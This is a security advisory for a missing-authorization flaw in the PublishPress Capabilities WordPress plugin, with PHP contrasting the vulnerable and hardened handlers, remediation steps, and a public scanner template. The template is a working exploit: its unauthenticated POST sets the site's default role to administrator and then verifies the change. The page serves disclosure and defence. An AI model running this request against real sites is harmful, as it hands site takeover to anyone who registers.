CVE-2021-25032: PublishPress Capabilities < 2.3.1 - Missing Authorization

Date: 2025-08-01 | Affected software: PublishPress Capabilities | PoC: public

Vulnerability description

The PublishPress Capabilities plugin for WordPress before 2.3.1 does not have proper authorization and CSRF checks when updating settings via the init hook, allowing unauthenticated attackers to update arbitrary blog options, such as setting the default role to administrator.
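The weakness described above is the combination of two missing gates on a settings handler: no capability check (authorization) and no nonce check (CSRF), on a hook that fires for every request. The following PHP is an added illustration written for this page, not PublishPress code; it shows that handler pattern next to a hardened form that a WordPress plugin author or reviewer would expect. All function names prefixed `example_`, the constants, and the allow-list are constructed for the example.

```php
<?php
// Added illustration, not the plugin's own code. Names prefixed example_ and
// the two constants below are constructed for this example.

// The pattern the advisory describes: a handler hooked on 'init' that trusts
// POST data and writes whatever options the request names. 'init' fires for
// unauthenticated requests too, so anyone who can reach the site can change
// options such as default_role.
function example_settings_save_unchecked() {
    if ( empty( $_POST['all_options'] ) ) {
        return;
    }
    foreach ( explode( ',', wp_unslash( $_POST['all_options'] ) ) as $option ) {
        if ( isset( $_POST[ $option ] ) ) {
            update_option( $option, sanitize_text_field( wp_unslash( $_POST[ $option ] ) ) );
        }
    }
}

// Hardened form: same handler, gated on an authenticated user with the right
// capability, a nonce bound to this specific action, and a fixed allow-list
// of options the handler is permitted to write.
const EXAMPLE_ALLOWED_OPTIONS = array( 'default_role' ); // constructed allow-list
const EXAMPLE_NONCE_ACTION    = 'example_save_settings';  // constructed nonce action

function example_settings_save_checked() {
    if ( empty( $_POST['all_options'] ) ) {
        return;
    }
    // 1. Authorization: only users allowed to manage options may proceed.
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        return;
    }
    // 2. CSRF: the submitted form must carry a nonce for this action;
    //    check_admin_referer() stops the request with wp_die() on failure.
    check_admin_referer( EXAMPLE_NONCE_ACTION, '_wpnonce' );
    // 3. Never let the request choose which options get written.
    $requested = explode( ',', sanitize_text_field( wp_unslash( $_POST['all_options'] ) ) );
    foreach ( $requested as $option ) {
        if ( ! in_array( $option, EXAMPLE_ALLOWED_OPTIONS, true ) || ! isset( $_POST[ $option ] ) ) {
            continue;
        }
        $value = sanitize_text_field( wp_unslash( $_POST[ $option ] ) );
        // 4. Validate the value: default_role must name a role that exists.
        if ( 'default_role' === $option && null === get_role( $value ) ) {
            continue;
        }
        update_option( $option, $value );
    }
}

// admin_init only fires on admin-side requests, unlike init; the capability
// and nonce checks above are still the controls that matter.
add_action( 'admin_init', 'example_settings_save_checked' );
```

The settings form that posts to the hardened handler emits the matching nonce with `wp_nonce_field( EXAMPLE_NONCE_ACTION )`. For a site that ran an affected version, the setting this advisory singles out can be checked directly with WP-CLI (`wp option get default_role`); a value of `administrator` on a site that allows registration means every new sign-up has been granted full control and the option should be reset, the plugin updated to 2.3.1 or later, and user accounts created since reviewed.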

PoC code [public]

id: CVE-2021-25032

info:
  name: PublishPress Capabilities < 2.3.1 - Missing Authorization
  author: ritikchaddha
  severity: critical
  description: |
    The PublishPress Capabilities plugin for WordPress before 2.3.1 does not have proper authorization and CSRF checks when updating settings via the init hook, allowing unauthenticated attackers to update arbitrary blog options, such as setting the default role to administrator.
  remediation: |
    Update the PublishPress Capabilities plugin to version 2.3.1 or later.
  reference:
    - https://wpscan.com/vulnerability/2f0f1a32-0c7a-48e6-8617-e0b2dcf62727/
    - https://plugins.trac.wordpress.org/changeset/2640161
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25032
    - https://github.com/RandomRobbieBF/CVE-2021-25032
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-25032
    cwe-id: CWE-352
    epss-score: 0.56027
    epss-percentile: 0.98029
    cpe: cpe:2.3:a:publishpress:capabilities:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: publishpress
    product: capabilities
    framework: wordpress
    fofa-query: body="/wp-content/plugins/capability-manager-enhanced"
  tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated

http:
  - raw:
      - |
        POST /wp-admin/admin.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        page=pp-capabilities-settings&all_options=default_role&default_role=administrator

      - |
        POST /wp-login.php?redirect_to=http%3A%2F%2F{{Hostname}}%2Fwp-admin%2Foptions-general.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=pp-capabilities HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "selected'> Administrator"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dd3cf0a907c17fb4428a92c70c45a43c529f8f9eecb448fe54da2b89680e9b4a022100ac60d33d6d74982369f34c8d0a1132ba797a63f541a05f5084cbc006279d76d4:922c64590222798bb761d5b6d8e72950
